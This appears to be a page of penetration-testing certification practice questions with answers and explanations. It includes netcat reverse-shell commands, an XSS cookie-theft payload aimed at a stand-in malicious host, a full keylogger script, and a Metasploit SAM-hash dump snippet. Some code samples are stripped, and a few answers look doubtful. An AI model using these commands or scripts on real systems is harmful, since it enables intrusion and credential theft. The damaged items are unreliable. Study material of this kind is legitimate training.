E.The packet was blocked outbound from the network

F.An attempted connection to the ssh service was prevented

A

A.The packet was blocked inbound to the network

D.An attempted connection to the telnet service was prevented

Explanation: OBJ-3.2: Firewall log formats will vary by vendor, but this example is a commonly used format from the Linux iptables firewall tool. This log starts with the date and time of the event and provides some key pieces of information. For example, the word “drop” shows the action this log entry recorded. In this case, the firewall dropped a packet due to an ACL rule being applied. You can also see that the packet was detected on the inbound connection over eth0, so we know that packets are being scanned and blocked when they are headed inbound to the network. Next, we see the MAC address of the source device of the packet, the source (SRC) IP address, and the destination (DST) IP address. Further down, we see the source (SPT) and destination (DPT) ports. In this case, the DPT is 23, which is the well-known port for telnet. Based on this single log entry, we cannot tell if packets are also being blocked when they attempt to leave the network, or if connections to the ssh service (port 22) are also being blocked.

45
Q

You are conducting a static code analysis of a Java program. Consider the following code snippet:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
String custname = request.getParameter("customerName");
String query = "SELECT account_balance FROM user_data WHERE user_name = ?";
PreparedStatement pstmt = connection.prepareStatement(query);
pstmt.setString(1, custname);
ResultSet results = pstmt.executeQuery();
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on the code above, what type of secure coding practice is being used?

A.Input validation

B.Session management

C.Authentication

D.Parameterized queries

A

D.Parameterized queries

Explanation OBJ-3.4: A parameterized query (also known as a prepared statement) is a means of pre-compiling a SQL statement so that all you need to supply are the “parameters” (think “variables”) that need to be inserted into the statement for it to be executed. It’s commonly used as a means of preventing SQL injection attacks. This code snippet is an example of a Java implementation of a parameterized query. Input validation would involve the proper testing of any input supplied by a user to an application. Since the first line takes the custname input without any validation, this is not an example of the input validation secure coding practice. Session management refers to the process of securely handling multiple requests to a web-based application or service from a single user or entity. Authentication is the act of proving an assertion, such as the identity of a computer system user. This code snippet is neither a form of session management nor authentication. You do not need to fully understand what this code is doing for the exam, but you should understand what it is not doing. There is nothing in the code that indicates session management or receiving usernames and passwords. Therefore, we can rule out session management and authentication. This leaves us with input validation and parameterized queries as our best options. Based on the code, we see the word query multiple times, which should be a hint that the answer is a parameterized query even if you can’t read this Java code fully.

46
Q

As part of the reconnaissance stage of a penetration test, Kumar wants to retrieve information about an organization’s network infrastructure without causing an IPS alert. Which of the following is his best course of action?

A.Perform a DNS brute-force attack

B.Use a nmap ping sweep

C.Perform a DNS zone transfer

D.Use a nmap stealth scan

A

A.Perform a DNS brute-force attack

Explanation: OBJ-3.2: The best course of action is to perform a DNS brute-force attack. The DNS brute-force attack queries a list of IPs and typically bypasses IDS/IPS systems that do not alert on DNS queries. A ping sweep or a stealth scan can be easily detected by the IPS, depending on the signatures and settings being used. A DNS zone transfer is also something that often has a signature search for it and will be alerted upon since it is a common attack technique.

47
Q

Which of the following types of attacks occurs when an attacker attempts to gain confidential information or login credentials by sending targeted emails to a specific set of recipients within an organization?

A.Phishing

B.Zero-day

C.Spear phishing

D.Spoofing

A

C.Spear phishing

Explanation OBJ-3.1: Spear phishing is the fraudulent practice of sending emails from a seemingly known or trusted sender to induce targeted individuals to reveal confidential information. The key to answering this question is that the attack was focused on a targeted set of people, not just an indiscriminate large group of random people.

48
Q

Which of the following secure coding best practices ensures a character like < is translated into the &lt; string when writing to an HTML page?

A.Session management

B.Output encoding

C.Error handling

D.Input validation

A

B.Output encoding

Explanation OBJ-3.4: Output encoding involves translating special characters into some different but equivalent form that is no longer dangerous in the target interpreter, for example, translating the < character into the &lt; string when writing to an HTML page. Input validation is performed to ensure only properly formed data is entering the workflow in an information system, preventing malformed data from persisting in the database and triggering the malfunction of various downstream components. Improper error handling can introduce various security problems where detailed internal error messages such as stack traces, database dumps, and error codes are displayed to an attacker. The session management implementation defines the exchange mechanism that will be used between the user and the web application to share and continuously exchange the session ID.

49
Q

A security analyst conducted an nmap scan of a server and found that port 25 is open.

What risk might this server be exposed to?

A.Open file/print sharing

B.Web portal data leak

C.Clear text authentication

D.Open mail relay

A

D.Open mail relay

Explanation OBJ-3.2: Port 25 is the default port for SMTP (Simple Mail Transfer Protocol), which is used for sending email. An open mail relay occurs when an SMTP server is configured in such a way that it allows anyone on the Internet to send email through it, not just mail originating from your known and trusted users. Spammers can exploit this type of vulnerability to use your email server for their own benefit. File/print sharing usually operates over ports 135, 139, and 445 on a Windows server. Web portals run on ports 80 and 443. Clear text authentication could occur using an unencrypted service, such as telnet (23), FTP (20/21), or the web (80).

50
Q

A cybersecurity analyst notices the following XML transaction while reviewing the communication logs for a public-facing application that receives XML input directly from its clients:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

]>
&abc;
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on the output above, which of the following is true?

A.An XML External Entity (XXE) vulnerability has been exploited and it’s possible that the password has downloaded the file /etc/passwd

B.There is no concern since /etc/passwd does not contain any system passwords

C.ISO-8859-1 only covers the Latin alphabet and may preclude other languages from being used

D.The application is using parameterized queries to prevent XML injections

A

A.An XML External Entity (XXE) vulnerability has been exploited and it’s possible that the password has downloaded the file /etc/passwd

Explanation OBJ-3.4: This is an example of an XML External Entity (XXE) vulnerability. Any references to document abc of type xyz may now be replaced with /etc/passwd, which would allow the user to harvest the data contained within the file. Although in modern Linux operating systems the /etc/passwd file only contains the usernames resident on the system and not the passwords, this is still valuable information for an attacker. The ‘/etc/passwd’ file has been better secured in recent systems by using a shadow file (which contains hashed values for the passwords). Unless an input validation step is added to the process, there is nothing to stop the attacker from gathering other potentially sensitive files from the server. While ISO-8859-1 does indeed cover the Latin alphabet and is standard throughout XML, it has no significance from a cybersecurity perspective. A parameterized query is a form of output encoding that defends against SQL and XML injections. This code does not contain a parameterized query.

51
Q

You are conducting a static analysis of an application’s source code and see the following: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(String) page += “”;
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on this code snippet, which of the following security flaws exists in this application?

A.Race condition

B.Improper input validation

C.Improper error handling

D.Insufficient logging and monitoring

A

B.Improper input validation

Explanation OBJ-3.4: Based on this code snippet, the application is not utilizing input validation. This would allow a malicious user to conduct an XSS (cross-site scripting) attack. For example, an attacker could input the following for a value of “ID”: ‘>document.location= ‘http://www.malicious-website.com/cgi-bin/cookie.cgi? Foo=’+document.cookie’. This could cause the victim ID to be sent to “malicious-website.com” where additional code could be run, or the session can then be hijacked. Based on the code snippet provided, we have no indications of the level of logging and monitoring being performed, nor if proper error handling is being conducted. A race condition is a software vulnerability when the resulting outcome from execution processes is directly dependent on the order and timing of certain events. Those events fail to execute in the order and timing intended by the developer.

52
Q

Your company has several small branch offices around the country, but you work as a network administrator at the centralized headquarters building. You need the capability of being able to remotely access any of the remote site’s routers to configure them without having to fly to each location in person. Your company’s CIO is worried that allowing remote access could allow an attacker to gain administrative access to the company’s network devices. Which of the following is the MOST secure way to prevent this from occurring while still allowing you to access the devices remotely?

A.Create an out-of-band management network

B.Install an out-of-band modem

C.Configure the remote routers’ ACLs to only permit Telnet traffic

D.Configure the remote routers’ ACLs to only permit HTTP traffic

A

A.Create an out-of-band management network

Explanation OBJ-5.3: You should create an out-of-band management network using an SSH (console) connection to the router. Telnet and HTTP are not encrypted channels and should not be used for remote connections. Using a modem is also a bad security practice since these are subject to war dialing and provide slow connectivity speeds.

53
Q

Riaan’s company runs critical web applications. During a vulnerability scan, Riaan found a serious SQL injection vulnerability in one of their web applications. The system cannot be taken offline to remediate the vulnerability. Which of the following compensating controls should Riaan recommend using until the system can be remediated?

A.IPS

B.WAF

C.Vulnerability scanning

D.Encryption

A

B.WAF

Explanation: OBJ-5.3: A WAF (web application firewall) is the best option since it can serve as a compensating control and protect against web application vulnerabilities like an SQL injection until the application can be fully remediated. Vulnerability scanning could only be used to detect the issue. Therefore, it is a detective control, not a compensating control. Encryption would not be effective in stopping an SQL injection. An IPS is designed to protect network devices based on ports, protocols, and signatures. It would not be effective against an SQL injection and is not considered a compensating control for this vulnerability.

54
Q

What SCAP component could be used to create a checklist to be used by different security teams within an organization and then report results in a standardized fashion?

A.XCCDF

B.CCE

C.CPE

D.CVE

A

A.XCCDF

Explanation OBJ-5.1: XCCDF (extensible configuration checklist description format) is a language that is used in creating checklists for reporting results. The Common Vulnerabilities and Exposures (CVE) system provides a reference-method for publicly known information-security vulnerabilities and exposures. The Common Configuration Enumeration (CCE) provides unique identifiers to system configuration issues to facilitate fast and accurate correlation of configuration data across multiple information sources and tools. Common Platform Enumeration (CPE) is a standardized method of describing and identifying classes of applications, operating systems, and hardware devices present among an enterprise’s computing assets.

55
Q

Susan, a help desk technician at Dion Training, has received several trouble tickets today related to employees receiving the same email as part of a phishing campaign. She has determined that the email’s malicious link is not being blocked by the company’s security suite when a user clicks the link. Susan asks you what action can be performed to prevent a user from reaching the website associated with the phishing email’s malicious link. What action do you recommend she utilize?

A.Block the IP address of the malicious domain in your firewall’s ACL

B.Add the malicious domain name to your content filter and proxy’s blacklist

C.Enable TLS on your organization’s mail server

D.Forward the phishing email to all employees with a warning not to click on the embedded links

A

B.Add the malicious domain name to your content filter and proxy’s blacklist

Explanation OBJ-5.3: To prevent a user from accessing the malicious website when the link is clicked, the malicious domain name should be added to the blacklist of the company’s content filter and web proxy. This will ensure that no devices on the network can reach the malicious domain name. While blocking the IP address associated with the domain name might help for a short period of time, the malicious domain’s owner could quickly redirect the DNS to point to a different IP. Then the users would still be able to access the malicious domain and its contents. Enabling TLS on the mail server will only encrypt the connection between the email server and its clients. Still, it will not prevent the users from clicking on the malicious link and accessing the malicious content. While informing the users that there is an active attempt at phishing being conducted against the organization is a good idea, forwarding the phishing email with the malicious link will generally cause more users to accidentally click on the malicious link, which further exacerbates the issue.

56
Q

During a penetration test, you identify a critical vulnerability in a client’s production Linux-based Apache webserver. Which of the following should you do NEXT?

A.Exploit the vulnerability, escalate privileges and patch the vulnerability as root

B.Enter “sudo apache2 stop” to prevent an attacker from exploiting the server

C.Complete the engagement and notify the client in the executive summary of the report

D.Pause the engagement and notify the client using established communication paths

A

D.Pause the engagement and notify the client using established communication paths

Explanation OBJ-5.4: The penetration testing team should have a direct communication path with the system owners or their trusted agents during an engagement. If the team discovers any security breaches, current hacking activity, extremely critical findings on a production server, or a production server becomes unresponsive during exploitation, then the team should stop what they are doing and contact their trusted point of contact within the organization to get further guidance. The trusted agents and communication paths should be determined when planning the engagement.

57
Q

What document typically contains high-level statements of management intent?

A.Procedure

B.Guideline

C.Standard

D.Policy

A

D.Policy

Explanation OBJ-1.2: Policies are high-level statements of management intent. Compliance with policies by employees should be mandatory. An information security policy will generally contain broad statements around the various cybersecurity objectives. Procedures describe exactly how to use the standards and guidelines to implement the countermeasures that support the policy. Standards and baselines describe specific products, configurations, or other mechanisms to secure the systems. A guideline is a recommendation that can specify the methodology that is to be used.

58
Q

You are reviewing a rule within your organization’s IDS. You see the following output:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"BROWSER-IE Microsoft Internet Explorer CacheSize exploit attempt"; flow:to_client,established; file_data; content:"recordset"; offset:14; depth:9; content:".CacheSize"; distance:0; within:100; pcre:"/CacheSize\s*=\s*/"; byte_test:10,>,0x3ffffffe,0,relative,string; metadata:policy max-detect-ips drop, service http; reference:cve,2016-8077; classtype:attempted-user; sid:65535; rev:1;)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on this rule, which of the following malicious packets would this IDS alert on?

A.A malicious inbound TCP packet

B.Any malicious outbound packets

C.A malicious outbound TCP packet

D.Any malicious inbound packets

A

A.A malicious inbound TCP packet

Explanation OBJ-3.2: The rule header (alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any) restricts this rule to TCP traffic travelling from an external web server port toward the protected network, so only inbound packets are examined. The flow option to_client,established narrows this further: the packet must be a server-to-client response on a TCP connection that has already completed its handshake. The rule will therefore alert on an inbound malicious TCP packet, and only when the payload also matches every content, pcre, and byte_test condition in the option block. This is an example of a Snort IDS rule. For the exam, you do not need to write your own IDS rules, but you should be able to read one and pick out generic details such as the protocol covered by the signature, the ports being analyzed, and the direction of flow.
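Reading a rule header by eye is exactly what the exam expects, but a small parser makes the reasoning mechanical. The following is an added example written for this page, not code from the exam or from the Snort project: it re-types the rule above as a string (RULE), splits the header into its seven fields, parses the option block while respecting quoted values, and classifies the rule as inbound or outbound relative to $HOME_NET. All function names are this example's own; it handles single-line rules only, not the backslash-continued multi-line form.

```python
# The rule from the question, re-typed by hand for this example (the option block is wrapped in
# parentheses as Snort requires; the page's copy lost them in extraction). Not from any rule set.
RULE = (
    'alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ('
    'msg:"BROWSER-IE Microsoft Internet Explorer CacheSize exploit attempt"; '
    'flow:to_client,established; file_data; content:"recordset"; offset:14; depth:9; '
    'content:".CacheSize"; distance:0; within:100; pcre:"/CacheSize\\s*=\\s*/"; '
    'byte_test:10,>,0x3ffffffe,0,relative,string; '
    'metadata:policy max-detect-ips drop, service http; '
    'reference:cve,2016-8077; classtype:attempted-user; sid:65535; rev:1;)'
)

HEADER_FIELDS = ("action", "proto", "src", "sport", "direction", "dst", "dport")


def split_options(body: str) -> list:
    """Split the option block on ';' but leave semicolons inside double quotes alone
    (a msg: or pcre: value may legitimately contain one)."""
    options, current, in_quotes = [], [], False
    for ch in body:
        if ch == '"':
            in_quotes = not in_quotes
        if ch == ";" and not in_quotes:
            options.append("".join(current).strip())
            current = []
        else:
            current.append(ch)
    tail = "".join(current).strip()
    if tail:
        options.append(tail)
    return [opt for opt in options if opt]


def parse_rule(rule: str) -> dict:
    """Parse a single-line Snort rule into its header fields and an ordered option list.
    Options are kept as (name, value) pairs because names such as content: repeat."""
    header, paren, body = rule.strip().partition("(")
    if not paren or not body.endswith(")"):
        raise ValueError("rule has no parenthesised option block")
    parts = header.split()
    if len(parts) != len(HEADER_FIELDS):
        raise ValueError(f"expected 7 header fields, got {len(parts)}: {header!r}")
    parsed = dict(zip(HEADER_FIELDS, parts))
    if parsed["direction"] not in ("->", "<>"):
        raise ValueError(f"bad direction operator {parsed['direction']!r}")
    options = []
    for opt in split_options(body[:-1]):
        name, sep, value = opt.partition(":")
        options.append((name.strip(), value.strip().strip('"') if sep else None))
    parsed["options"] = options
    return parsed


def first_option(parsed: dict, name: str):
    """Return the value of the first option called `name`, or None if the rule lacks it."""
    return next((value for opt, value in parsed["options"] if opt == name), None)


def traffic_direction(parsed: dict) -> str:
    """Classify the rule relative to the protected network ($HOME_NET), which is what the
    exam question is really asking: does the header point into or out of our network?"""
    src, dst = parsed["src"], parsed["dst"]
    if parsed["direction"] == "<>":
        return "bidirectional"
    if dst == "$HOME_NET" and src != "$HOME_NET":
        return "inbound"
    if src == "$HOME_NET" and dst != "$HOME_NET":
        return "outbound"
    return "internal" if src == dst == "$HOME_NET" else "unknown"


def summarize(rule: str) -> dict:
    """The generic facts an analyst pulls out of a rule at a glance."""
    p = parse_rule(rule)
    return {
        "action": p["action"],
        "protocol": p["proto"],
        "direction": traffic_direction(p),
        "ports": f'{p["sport"]} -> {p["dport"]}',
        "flow": first_option(p, "flow"),
        "sid": first_option(p, "sid"),
        "contents": [v for n, v in p["options"] if n == "content"],
    }


if __name__ == "__main__":
    for key, value in summarize(RULE).items():
        print(f"{key:>9}: {value}")
```

For the rule in the question, summarize reports the action alert, protocol tcp, direction inbound, ports $HTTP_PORTS -> any and flow to_client,established, which is the chain of reasoning behind answer A.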

59
Q

You are working as part of a penetration testing team during an engagement. A coworker just entered “sudo systemctl start DionTrainingApp” in the shell of a Linux server the team exploited.

What action is your coworker performing with this command?

A.To enable persistence on the server

B.To enumerate the running services on the server

C.To remove persistence on the server

D.To shut down the running service on the server

A

A.To enable persistence on the server

Explanation OBJ-3.7: This scenario uses systemctl to establish persistence on a Linux server from within its shell. systemd is the init system and service manager that has become the standard on most Linux distributions, and systemctl is its control utility: it starts and stops services, checks and changes their status, and works with their unit files. Entering "sudo systemctl start DionTrainingApp" tells systemd to start the unit named DionTrainingApp right away. DionTrainingApp is a fictional service name used in this example to disguise the penetration tester's persistence tooling; the tester can name the unit anything that blends in when installing it. Note that start only runs the service for the current boot; to have systemd launch it again after a reboot the tester would also run "sudo systemctl enable DionTrainingApp" (or "enable --now" to do both at once), and a defender looking for this kind of persistence should compare the unit files under /etc/systemd/system against a known-good baseline.

60
Q

What is the term for exploiting a weakness in a user’s wireless headset to compromise their smartphone?

A.Multiplexing

B.Zero-day attack

C.Smurfing

D.Bluejacking

A

D.Bluejacking

Explanation OBJ-3.3: Bluejacking sends unsolicited messages over Bluetooth to Bluetooth-enabled devices such as mobile phones, PDAs, or laptop computers.

61
Q

You are conducting a physical penetration test against an organization. You followed an employee to the coffee shop next door, and while they were ordering, you got within 1 foot of them to electronically capture their proximity badge. Which of the following exploits are you planning to use?

A.Session hijacking

B.Bluesnarfing

C.RFID cloning

D.Credential harvesting

A

C.RFID cloning

Explanation: OBJ-3.3: Radio-frequency identification (RFID) is a technology for identifying and tracking an object's physical location using radio waves. RFID cloning is the act of copying the authentication data from one RFID badge's microchip onto another badge. In an attack scenario, badge cloning is useful because it gives the attacker working access credentials without stealing a physical badge from the organization. Badge cloning can be done with handheld RFID writers, which are inexpensive and easy to use: hold the badge up to the writer, press a button to copy the tag's data, then hold a blank badge up to the device and write the copied data onto it. Because a cloning tool reads the card the same way a legitimate reader does, it can be concealed in a bag and, depending on the card technology and antenna, work from up to several feet away.

62
Q

You are logged into the Windows command prompt and want to find what systems are alive in a portion of a Class B network (172.16.0.0/24) using ICMP. What command would best accomplish this?

A.ping 172.16.0.0

B.ping 172.16.0.255

C.for %X in (1 1 255) do PING 172.16.0.%X

D.for /L %X in (1 1 254) do PING -n 1 172.16.0.%X | FIND /I "Reply"

A

D.for /L %X in (1 1 254) do PING -n 1 172.16.0.%X | FIND /I "Reply"

Explanation OBJ-4.4: The Windows command line supports some basic scripting, as this answer shows. for /L steps an iterative variable from a starting value (start#) in increments of step# until it passes the ending value (end#), at which point the command shell leaves the loop. A negative step# counts down instead: (1,1,5) generates the sequence 1 2 3 4 5 and (5,-1,1) generates 5 4 3 2 1. The syntax is "for /L %variable in (start# step# end#) do command [CommandLineOptions]". Here the loop sends a single ICMP echo request (-n 1) to every host address in 172.16.0.0/24, and FIND /I keeps only the output lines containing "Reply", so only hosts that answered are printed. Inside a batch file the variable must be written %%X rather than %X, and adding -w with a short timeout in milliseconds keeps the sweep from stalling on hosts that never answer.

63
Q

Which of the following commands should be run on an attacker’s system to create a reverse shell?

A.nc -lp 31337

B.nc 192.168.1.53 31337 -e /bin/sh

C.nc -lp 31337 -e /bin/sh

D.nc 192.168.1.53 31337

A

A.nc -lp 31337

Explanation OBJ-4.3: A reverse shell is established when the target machine connects out to an attack machine that is listening on a specific port. To set up that listener on the attack machine, you would use the command "nc -lp 31337" on it. To connect back to the attacking machine from the victim machine, you would enter "nc 192.168.1.53 31337 -e /bin/sh" on the victim. A bind shell is established when a victim system "binds" its shell to a local network port. To achieve this using netcat, you would execute "nc -lp 31337 -e /bin/sh" on the victim machine; this sets up a listener on port 31337 that executes /bin/sh for whoever connects. The attacker would then enter "nc 192.168.1.53 31337" to connect to the victim's bind shell. Note that the -e option exists in netcat-traditional and in Nmap's ncat (as -e or --exec); the OpenBSD netcat shipped by many distributions omits it, so check which variant is installed before relying on these commands.

64
Q

A coworker sent you the following Python script to use during an upcoming engagement for Dion Training’s corporate network:

-=-=-=-=-=-
import pyHook, sys, logging, pythoncom, datetime

# Raw string so the backslashes are not treated as escape sequences
log_file = r'C:\Windows\Temp\log_diontraining.txt'

def KbrdEvent(event):
    # Append each keystroke's ASCII character to the log file, one per line
    logging.basicConfig(filename=log_file, level=logging.DEBUG, format='%(message)s')
    logging.log(10, chr(event.Ascii))
    return True  # pass the keystroke on so the user notices nothing

# Hook every KeyDown event system-wide and pump the Windows message loop forever
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = KbrdEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
-=-=-=-=-=-

During the upcoming engagement, what should you use this script to perform?

A.Scheduling

B.Keylogging

C.Collecting logs

D.Debugging an exploit

A

B.Keylogging

Explanation OBJ-4.4: This short Python script is an effective keylogger. The KbrdEvent function is registered as the handler for every KeyDown event that pyHook's HookManager captures system-wide, and it appends the ASCII character of each keystroke to a file in the C:\Windows\Temp\ directory for later exfiltration by the penetration tester; pythoncom.PumpMessages keeps the Windows message loop running so the hook stays active. Because pyHook and pythoncom are Windows-only modules, the script will only run on a Windows host.

65
Q

It is your first day as a penetration tester at a new job. Your boss provides you with a brand new laptop running Kali Linux. You log in and need to start up Metasploit to begin working. What command do you enter in the bash prompt?

A.msfvenon

B.db_init

C.msfconsole

D.db_connect

A

C.msfconsole

Explanation OBJ-4.3: The Metasploit Framework is a command-line-based penetration testing framework developed by Rapid7 that is included with Kali Linux and that enables you to find, exploit, and validate vulnerabilities. Metasploit also has GUI-based commercial and community versions. To start the program, type "msfconsole" at the bash prompt in Kali Linux, since it is already installed by default.

66
Q

Which tool would allow you to identify the target’s operating system by analyzing the TCP/IP stack responses?

A.nmap

B.dd

C.scanf

D.msconfig

A

A.nmap

Explanation OBJ-4.2: The nmap tool can identify the target's operating system by analyzing its TCP/IP stack responses (the -O option). Identification relies on differences in how operating systems and operating system versions respond to a query, which TCP options they support, the order in which they send the packets, and other details that, when combined, provide a unique fingerprint for a given TCP stack.

67
Q

You are working as part of a penetration testing team targeting Dion Training’s wireless network.

Which of the following tools should you use to gather information about their wireless network?

A.WHois

B.Burp suite

C.BeEF

D.Kismet

A

D.Kismet

Explanation OBJ-4.2: Kismet is an 802.11 Layer 2 wireless network detector, sniffer, and intrusion detection system included with Kali Linux. It can monitor wireless activity, identify device types, and capture raw packets for later password cracking. Whois is a protocol that queries databases that store registered users or assignees of an Internet resource, such as a domain name. YASCA (Yet Another Source Code Analyzer) is an open-source SAST program that inspects source code for security vulnerabilities, code quality, and performance. Burp Suite is an integrated platform for testing web applications' security by acting as a local proxy so that the attacker can capture, analyze, and manipulate HTTP traffic. BeEF (Browser Exploitation Framework) is a penetration testing tool included with Kali Linux that focuses on web browsers and can be used for XSS and injection attacks against a website.

68
Q

You want to exploit the NETBIOS name service on a Windows-based network.

Which of the following tools should you use?

A.Arpspoof

B.Nessus

C.John the Ripper

D.Responder

A

D.Responder

Explanation OBJ-4.2: Responder provides a fake server and relay tool that is included with Kali Linux. It responds to LLMNR, NBT-NS (NETBIOS), POP, IMAP, SMTP, and SQL queries to recover sensitive information such as user names and passwords. Responder is configured to listen for LLMNR/NBNS queries and respond with itself as the desired destination. When the client then tries to connect, it prompts the user to log on based on the client’s protocol, thus harvesting the user’s credentials.

69
Q

Which of the following open source tools allows a penetration tester to conduct vulnerability scans against a company’s infrastructure?

A.Peach

B.Wireshark

C.OpenVAS

D.CeWL

A

C.OpenVAS

Explanation OBJ-4.2: OpenVAS (Open Vulnerability Assessment System) is an open-source software framework for vulnerability scanning and management that can scan for vulnerabilities, misconfigurations, default passwords, and susceptibility to denial of service (DoS) attacks. Wireshark is an open-source network protocol analyzer used to sniff many traffic types, re-create entire TCP sessions, and capture copies of files transmitted on the network. Peach is a dynamic application security testing tool used to conduct fuzzing. CeWL is a Ruby app that crawls websites to generate word lists that can be used with password crackers such as John the Ripper.

70
Q

A coworker sent you the following snippet of a Ruby script to use during an upcoming engagement for Dion Training’s corporate network:

-=-=-=-=-=-
if client.platform == 'windows'
  db_ok = client.framework.db.active
  client.core.use("priv") if not client.respond_to?("priv")
  client.core.use("incognito") if not client.respond_to?("incognito")
  hashes = client.priv.sam_hashes
  addr = client.sock.peerhost
  print_good "Working..."
  hashes.each do |hash|
    data = {}
    data[:host] = addr
    data[:port] = 445
    data[:sname] = 'smb'
    data[:user] = hash.user_name
    data[:pass] = hash.lanman + ":" + hash.ntlm
    data[:type] = "smb_hash"
    data[:active] = true
    print_line " Extracted: #{data[:user]}:#{data[:pass]}"
    client.framework.db.report_auth_info(data) if db_ok
  end
end
-=-=-=-=-=-

During the upcoming engagement, what should you use this script to perform?

A.Network enumeration

B.Credential harvesting

C.Proxying a connection

D.Establishing a bind shell

A

B.Credential harvesting

Explanation: OBJ-4.4: This snippet of Ruby comes from the Metasploit Framework's credcollect.rb Meterpreter script. Most Meterpreter scripts in Metasploit are written in Ruby, which quickly became one of the favorite languages of penetration testers. Even if you cannot read and understand the entire script, you should be able to identify keywords and phrases that point to the correct answer. For example, the line "hashes = client.priv.sam_hashes" pulls the password hashes out of the Windows SAM, which is used for local authentication. The script then loops over each hash, builds a record containing the user name and the LM:NTLM hash pair, prints it, and stores it in the Metasploit database as an SMB credential. For the exam, you need to be able to read a script and understand its basic workflow and functions.
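The Ruby snippet hands each SAM entry to the database as an smb_hash credential whose password field is LM:NTLM. The following is an added example written for this page, not code from Metasploit or the exam: it parses the text form of the same data (the user:rid:lm:nt::: layout that hashdump and pwdump produce), flags the two things a tester checks first (whether an LM hash is present at all, and whether the NT hash is the well-known empty-password value), groups accounts that share a password, and reshapes a record into the same keys the Ruby snippet's data hash uses. SAMPLE_DUMP is a constructed sample with fake accounts; the function names are this example's own.

```python
from collections import defaultdict

# Well-known hash values for an empty LM field and for an empty NT password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in the pwdump/hashdump layout (user:rid:lm:nt:::). Fake accounts;
# the hash strings are standard test values, not material from any real system.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
this line is not a hash record
"""


def _is_hex32(s: str) -> bool:
    return len(s) == 32 and all(c in "0123456789abcdefABCDEF" for c in s)


def parse_hashdump(text: str):
    """Turn hashdump output into records plus a list of line numbers that did not parse.
    Each record carries the two flags a tester checks first: is there a crackable LM hash
    (fast to break, and its presence means LM storage is still enabled), and is the NT
    hash the empty-password value (the account has no password at all)."""
    records, bad_lines = [], []
    for lineno, line in enumerate(text.splitlines(), start=1):
        line = line.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4 or not (_is_hex32(parts[2]) and _is_hex32(parts[3])):
            bad_lines.append(lineno)
            continue
        user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        records.append({
            "user": user,
            "rid": rid,
            "lm": lm,
            "nt": nt,
            "lm_present": lm != EMPTY_LM,
            "nt_blank": nt == EMPTY_NT,
        })
    return records, bad_lines


def shared_nt_hashes(records) -> dict:
    """Group accounts by NT hash: identical hashes mean identical passwords, which is the
    password-reuse finding that usually matters more than any single cracked hash."""
    by_hash = defaultdict(list)
    for rec in records:
        by_hash[rec["nt"]].append(rec["user"])
    return {h: users for h, users in by_hash.items() if len(users) > 1}


def to_credcollect(rec: dict, host: str) -> dict:
    """Shape one record the way the Ruby snippet's `data` hash does: an smb_hash credential
    for port 445 whose password field is `LM:NT`, ready for pass-the-hash tooling."""
    return {
        "host": host,
        "port": 445,
        "sname": "smb",
        "user": rec["user"],
        "pass": f'{rec["lm"]}:{rec["nt"]}',
        "type": "smb_hash",
        "active": True,
    }


if __name__ == "__main__":
    recs, bad = parse_hashdump(SAMPLE_DUMP)
    for rec in recs:
        flags = ["LM hash present" if rec["lm_present"] else "no LM hash"]
        if rec["nt_blank"]:
            flags.append("EMPTY PASSWORD")
        print(f'{rec["user"]:<14} {", ".join(flags)}')
    print("password reuse:", shared_nt_hashes(recs))
    print("unparsed lines:", bad)
```

On the constructed sample this reports Guest as having an empty password, svc_backup as still carrying an LM hash, and Administrator and svc_backup as sharing a password; a malformed line is reported by number rather than silently dropped.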

71
Q

Consider the following file called firewall.log that contains 53,682 lines that logged every connection going into and out of this network. The log file is in the following data format, as shown below with the header and the first record of the log file:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
DATE,FACILITY,CHAIN,IN,SRC,DST,LEN,TOS,PREC,TTL,ID,PROTO,SPT,DPT
Jan 11 05:33:59,lx1 kernel: iptables,INPUT,eth0,10.1.0.102,10.1.0.1,52,0x00,0x00,128,2242,TCP,2564,23
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Which of the following commands would display all of the lines from the firewall.log file that contain the destination IP address of 10.1.0.10 and a destination port of 23?

A.grep "10.1.0.10," firewall.log | grep "23$"

B.grep "10.1.0.10\," firewall.log | grep "23"

C.grep "10.1.0.10\," firewall.log | grep "23$"

D.grep "10.1.0.10," firewall.log | grep "23"

A

C.grep “10.1.0.10\,” firewall.log | grep “23$”

